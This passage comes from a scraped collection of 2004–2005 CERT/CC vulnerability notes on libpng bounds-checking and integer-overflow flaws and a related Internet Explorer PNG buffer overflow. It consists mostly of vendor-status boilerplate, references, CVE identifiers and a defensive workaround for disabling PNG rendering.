Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe 
CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Red Hat Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### SCO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding 
this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### SuSE Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Sun Microsystems Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Unisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Wind River Systems Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\nView all 36 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0599](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0599>) \n---|--- \n**Severity Metric:** | 0.97 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2004-08-04 15:59 UTC \n**Document Revision: ** | 18 \n", "modified": "2004-08-04T15:59:00", "published": "2004-08-04T00:00:00", "id": "VU:160448", "href": "https://www.kb.cert.org/vuls/id/160448", "type": "cert", "title": "libpng integer overflow in image height 
processing", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-18T20:43:44", "bulletinFamily": "info", "cvelist": ["CVE-2004-0597"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a flaw that could introduce a remotely exploitable vulnerability.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nA potentially insufficient bounds check error exists within the `png_handle_sBIT()` function. A similar error exists in the `png_handle_hIST()` function. While the code that contains these errors could potentially permit a buffer overflow to occur during a subsequent `png_crc_read()` operation, it is unclear what practical vulnerabilities they might present in applications using libpng. \n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, multiple applications will be affected by this issue in different ways. \n \nPlease note that this vulnerability is known to exist in Microsoft Windows Messenger and MSN Messenger. Please see [MS05-009](<http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>) for more details. For information regarding how this vulnerability affects Microsoft Internet Explorer, refer to [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>). \n \n--- \n \n### Impact \n\nThe complete impact of this vulnerability is not yet known. 
\n \n--- \n \n### Solution \n\n**Apply a patch from the vendor**\n\n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n817368\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Microsoft Corporation __ Affected\n\nNotified: July 16, 2004 Updated: June 14, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MS05-009](<http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>) and [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>) for information concerning this vulnerability and its remediation.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this 
vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). 
An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Apple Computer Inc. 
Unknown\n\nNotified: July 16, 2004 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Cray Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### IBM Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional 
information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### IMmunix Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### MontaVista Software Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 
Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Red Hat Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### ScO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 
Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### SuSE Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Sun Microsystems Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Wind River Systems Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### uNisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n * <http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>\n * <http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>\n\n### 
Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0597](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0597>) \n---|--- \n**Severity Metric:** | 0.76 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2005-06-14 20:57 UTC \n**Document Revision: ** | 20 \n", "modified": "2005-06-14T20:57:00", "published": "2004-08-04T00:00:00", "id": "VU:817368", "href": "https://www.kb.cert.org/vuls/id/817368", "type": "cert", "title": "libpng png_handle_sBIT() performs insufficient bounds checking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:43:27", "bulletinFamily": "info", "cvelist": ["CVE-2004-0597", "CVE-2005-1211"], "description": "### Overview \n\nA buffer overflow in the PNG image rendering component of Microsoft Internet Explorer (IE) may allow a remote attacker to execute code on a vulnerable system. \n\n### Description \n\nThe Portable Network Graphics (PNG) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). Microsoft Internet Explorer supports PNG image format. The PNG image rendering component of Microsoft Internet Explorer (`pngfilt.dll`) does not properly handle PNG image files, potentially allowing a buffer overflow to occur. If a remote attacker can persuade a user to access a specially crafted PNG image with IE, that attacker may be able to trigger the buffer overflow.\n\nFor more information about affected components, please refer to [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>). Please note that Microsoft has reported this issue is distinct from those previously reported in [VU#817368](<http://www.kb.cert.org/vuls/id/817368>) and [VU#388984](<http://www.kb.cert.org/vuls/id/388984>) (CAN-2004-0597). 
\n \n--- \n \n### Impact \n\nIf a user opens a specially-crafted PNG image using a vulnerable version of Internet Explorer, an attacker may be able to execute arbitrary code with the privileges of the user or cause Internet Explorer to terminate. \n \n--- \n \n### Solution \n\n**Apply An Update** \nMicrosoft has addressed this issue in Microsoft Security Bulletin [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>). \n \n--- \n \nMicrosoft Security Bulletin [](<http://www.microsoft.com/technet/security/bulletin/ms05-028.mspx>)[MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>) suggests the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. \n \n**Disable PNG rendering** \n \nUntil the patch can be applied, you may wish to disable the PNG rendering in IE. To disable the PNG rendering, follow these steps: \n\n\n 1. Click **Start**, click **Run**, type \"**regsvr32 /u pngfilt.dll**\" (without the quotation marks), and then click **OK**.\n 2. A dialog box appears to confirm that the unregistration process has succeeded. Click **OK** to close the dialog box.\n 3. Close Internet Explorer, and reopen it for the changes to take effect.\n \nIn addition, the following techniques may reduce the likelihood of exploitation: \n \n**Read and send email in plain text format** \n \nOutlook 2003, Outlook 2002 SP1, and Outlook 6 SP1 can be configured to view email messages in text format. Consider the security of fellow Internet users and send email in plain text format when possible. Note that reading and sending email in plain text will not necessarily prevent exploitation of this vulnerability. \n \n**Do not follow unsolicited links** \n \nIn order to convince users to visit their sites, attackers often use URL encoding, IP address variations, long URLs, intentional misspellings, and other techniques to create misleading links. 
